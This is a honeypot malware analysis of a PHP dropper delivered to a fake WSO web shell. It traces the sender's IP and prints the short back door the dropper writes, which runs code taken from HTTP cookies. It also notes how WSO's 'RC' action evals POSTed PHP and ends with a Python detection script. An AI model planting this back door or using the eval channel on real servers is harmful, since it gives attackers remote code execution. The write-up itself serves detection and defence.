212.54.205.145-2018-01-25a

Back door executing out of HTTP cookies

Small piece of obscured PHP that executes functions named in HTTP cookies on PHP code also named in HTTP cookies. Very obscure.

Other people have discovered this code.

Origin

IP address 212.54.205.145

DNS did not have a name for 212.54.205.145, but whois lists a Greek network for it:

route:          212.54.192.0/19
descr:          FORTHNET
origin:         AS1241
mnt-by:         FORTHNETGR-MNT
created:        2001-12-05T16:14:19Z
last-modified:  2005-10-31T13:00:57Z

traceroute has packets going through te0-2-0.vll-kln-07.forthnet.gr, so I believe the whois data.

Download

Downloaded to a fake WSO web shell I've thoughtfully provided with my WordPress honey pot. The PHP dropper code was sent to the "RC" action of WSO, which is smart: WSO's "RC" action just evals any PHP that arrives in a POST variable named "p1", so the downloader doesn't have to muck around with surrounding HTML as it would when invoking the "Php" action.

p0f3 thinks the downloading IP address runs Linux 2.6.x.

This did arrive with a cookie that has name and value of "227e948fdbaaeccbbb7b3f42fbe848e8". This is "www.stratigery.com" hashed according to an algorithm used by the Vigilante Malware Cleaner. That cleaner installs code in WSO instances that essentially provides an extra layer of password protection. This cookie is (a) further evidence the attackers thought they were accessing a WSO web shell, and (b) evidence that the attackers are somehow related to, or in contact with, the Vigilance Committee.

Decoding

  1. Hand edit 212.54.205.145Wmk0bnfUh61dvtcSreRhgQAAAAA.php.file into `dc1.php`
  2. Invoke `php dc1.php > dc2.php`

Analysis

The PHP dropper code finds a writeable directory somewhere under the web server's DocumentRoot directory, creates a file name of eight random lower-case English letters like "fksornju.php" or "jpehbzly.php", then writes PHP code for a back door into the file so named.

Fairly clever back door:

<?php

$erz=$_COOKIE;               // copy of every cookie sent with the request
$edqg=$erz[gslp];            // cookie "gslp" names a decoding function (bare-word key, as in the sample)
if($edqg){
    // decode cookie "tusx" and cookie "gxfe" with that function, build a function from the
    // decoded "gxfe" body (named by the decoded "tusx" value), then call the result
    $upu=$edqg($erz[tusx]);$qwdq=$edqg($erz[gxfe]);$zlat=$upu("",$qwdq);$zlat();
}

If the HTTP cookie sent with the back door HTTP access has values named "gslp", "tusx" and "gxfe", this back door can decode some encoded-PHP that also arrives in the cookie, run it as the body of a function also named in the cookie, and then run another function, astonishingly named in the cookie.

The back door is, strictly speaking, not decipherable until someone sends a cookie with those names and values in it. But so what? It's obviously running code that comes in an HTTP cookie that anyone could send.
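The tell in this back door is not any particular function name but the shape of the code: a value that came from `$_COOKIE` ends up in call position (`$x(...)`). An added example, not part of the original write-up, of a small scanner that flags that shape in PHP source and also flags the dropper's eight-random-letter file names; the two sample sources are constructed here (the first is the back door quoted above, the second a benign cookie reader) and the `scan_tree` helper is an assumed convenience for walking a web root:

```python
import re
from pathlib import Path

# Constructed samples: the cookie-driven back door from the write-up, and a
# benign script that reads a cookie but never calls anything derived from it.
BACKDOOR_SRC = """<?php
$erz=$_COOKIE;
$edqg=$erz[gslp];
if($edqg){
    $upu=$edqg($erz[tusx]);$qwdq=$edqg($erz[gxfe]);$zlat=$upu("",$qwdq);$zlat();
}
"""
BENIGN_SRC = """<?php
$lang = $_COOKIE['lang'] ?? 'en';
echo htmlspecialchars($lang);
"""

VAR = r"\$[A-Za-z_]\w*"
RANDOM_NAME = re.compile(r"^[a-z]{8}\.php$")  # dropper names like fksornju.php

def tainted_vars(src):
    """Variables carrying cookie data, following simple '$a = $_COOKIE...',
    '$b = $a[...]' and '$b = $a(...)' assignments until nothing new appears."""
    tainted = {"$_COOKIE"}
    assign = re.compile(rf"({VAR})\s*=\s*({VAR})")   # lhs = rhs... (not ==)
    changed = True
    while changed:
        changed = False
        for lhs, rhs in assign.findall(src):
            if rhs in tainted and lhs not in tainted:
                tainted.add(lhs)
                changed = True
    return tainted

def cookie_calls(src):
    """Sorted names of cookie-derived variables that are invoked as '$x('."""
    tainted = tainted_vars(src)
    calls = re.findall(rf"({VAR})\s*\(", src)
    return sorted({v for v in calls if v in tainted and v != "$_COOKIE"})

def scan_file(path, src):
    """Findings for one PHP file; an empty list means nothing suspicious."""
    findings = []
    if RANDOM_NAME.match(Path(path).name):
        findings.append("random 8-letter filename")
    called = cookie_calls(src)
    if called:
        findings.append("cookie-derived value called as function: " + ", ".join(called))
    return findings

def scan_tree(root):
    """Hypothetical helper: scan every *.php under root, returning {path: findings}."""
    return {str(p): f for p in Path(root).rglob("*.php")
            if (f := scan_file(p, p.read_text(errors="ignore")))}
```

The taint tracking is deliberately shallow (straight-line assignments only), so treat a hit as a prompt to read the file, not as proof by itself.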

Is concealing code in HTTP cookies the new black?